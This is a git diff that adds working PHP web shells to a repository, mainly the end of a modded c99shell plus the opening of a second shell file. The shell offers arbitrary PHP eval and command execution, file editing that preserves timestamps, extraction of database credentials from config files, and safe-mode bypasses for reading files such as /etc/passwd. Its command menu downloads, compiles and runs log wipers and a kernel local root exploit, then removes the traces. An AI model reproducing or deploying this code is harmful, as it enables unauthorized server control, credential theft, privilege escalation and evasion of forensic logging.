+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><br/><b>Local Command:</b> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><br/>
+    <b> Quick Commands </b></div>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+        <input type=hidden name=act value="cmd">
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+         <SELECT NAME="cmd">
+		 <OPTION VALUE="#"> [File Manipulation]
+		 <OPTION VALUE="">                   
+		 <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system
+		 <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files
+           <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory
+           <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files
+           <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory
+		    <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions
+			 <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files
+             <OPTION VALUE="find . -type f -name config.inc.php">Find config.inc.php files in current directory
+             <OPTION VALUE="find / -type f -name "config*">Find config* files
+             <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory
+              <OPTION VALUE="find / -type f -perm -2 -ls">Find all writable files
+             <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory
+             <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files
+	    	 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory
+			 <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files
+			 <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory
+			 <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files
+			 <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory
+			 <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files
+			 <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory
+			 <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files
+			<OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory
+			 <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files
+			<OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory
+			<OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
+			<OPTION VALUE="">                   
+		<OPTION VALUE="#"> [Directory Malipulation]
+		<OPTION VALUE="">                  
+		<OPTION VALUE="pwd">List your current directory
+		<OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable?
+		<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="">                   
+<OPTION VALUE="#"> [Miscellaneous Commands]
+<OPTION VALUE="">                   
+           <OPTION VALUE="tar -cvf NEWTAR!!.tar -c <?php passthru('pwd'); ?>">Tar your current directory. (Only works if the directory is writable)
+  <OPTION VALUE="uname -a">Kernel version
+           <OPTION VALUE="w">Logged in users
+           <OPTION VALUE="lastlog">Last users to connect
+           <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
+           <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords
+            <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo
+             <OPTION VALUE="netstat -atup | grep IST">Open ports    
+			 <OPTION VALUE="">                                     
+            <OPTION VALUE="#"> [Application Verification]
+			<OPTION VALUE="">                   
+            <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera)
+            <OPTION VALUE="locate gcc">Check For GCC
+			<OPTION VALUE="">                   
+		   <OPTION VALUE="#"> [Log Cleaners]
+		   <OPTION VALUE="">                   
+                    <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3)
+                    <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3)
+                    <OPTION VALUE="./logcleaner-0.3 <? echo $_SERVER["REMOTE_ADDR"]; ?>">Wipelogs (Part 3)(Zap3)
+                    <OPTION VALUE="Gone!<? if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ?>">Remove All Zap3 Traces
+                   <OPTION VALUE="">  
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish)
+                    <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish)
+                     <OPTION VALUE="./vanish <? echo exec('whoami'); ?> <? echo $_SERVER["REMOTE_ADDR"]; ?> <? echo gethostbyname($_SERVER["HTTP_HOST"]); ?>">Wipelogs (Part 3)(Vanish)
+                    <OPTION VALUE="Gone!!<? if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ?>">Remove All Vanish Traces
+                   <OPTION VALUE=""> 
+                   <OPTION VALUE="#"> [Root Exploits]
+		   <OPTION VALUE=""> 
+                    <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 1)
+                   <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 2)
+                   <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 3)
+                   <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 4)
+                   <OPTION VALUE="Gone!!!<? if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ?>">Remove All Exploit Traces
+                    </SELECT>
+        
+        <input type=hidden name="cmd_txt" value="1">
+        &nbsp;
+        <input type=submit name=submit value="Execute"></div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+  <center><br/><b> Kernel Information </b>
+<form action=http://google.com/search name=f><input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=80>
+&nbsp;
+<input type=submit value="Search" name=btnG></form>
+</center>
+    </td>
+</tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><strong>PHP Safe-Mode Bypass (Read Files)    </strong></div>
+    <br>
+    <form action="<?php echo $surl; ?>" method="post">
+      <div align="center">
+      File: <input type="text" name="file"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+      <?php
+      function rsg_read()
+	{	
+	$test="";
+	$temp=tempnam($test, "cx");
+	$file=$_REQUEST['file'];	
+	$get=htmlspecialchars($file);
+	echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+
+
+	echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>";
+	unlink($temp);
+	} else {
+	echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File
+	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+	access.</CENTER></FONT>");
+			}
+	echo "</div>";
+	}
+	
+	if(isset($_REQUEST['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	<?
+	
+	function rsg_glob()
+{
+$chemin=$_REQUEST['directory'];
+$files = glob("$chemin*");
+echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+	echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_REQUEST['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+     <strong>PHP Safe-Mode Bypass (List Directories)</strong>:     
+     <form action="<?php echo $surl; ?>" method="post">
+      <div align="center"><br>
+      Dir: <input type="text" name="directory"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
+
+    </form></center>
+    </td>
+</tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Search</b>
+   <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Upload</b>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b><strong>Create Directory
+  </strong>
+  <p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>
+    <strong>Create File </strong>
+    <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>Enter Directory </b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+    <b>Access File</b>
+    <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+</td>
+</tr>
+</TABLE>
+<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#333333 style="BORDER-COLLAPSE: collapse">
+  <tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell modded by <a href=http://w4ck1ng.com class="style1">w4ck1ng</a>. | <? echo("$shver"); ?> | Page generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</p></td></tr></table>
+<br/></body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/138shell/W/webshell.txt b/138shell/W/webshell.txt
new file mode 100644
index 0000000..766b719
--- /dev/null
+++ b/138shell/W/webshell.txt
@@ -0,0 +1,268 @@
+<?php
+
+//This PHP Web Shell was developed by Digital Outcast It is  open software and completely free to modify in any way you wish. Have fun and don't be all skiddy and just take credit for creating it. Bad things will happen if you do.
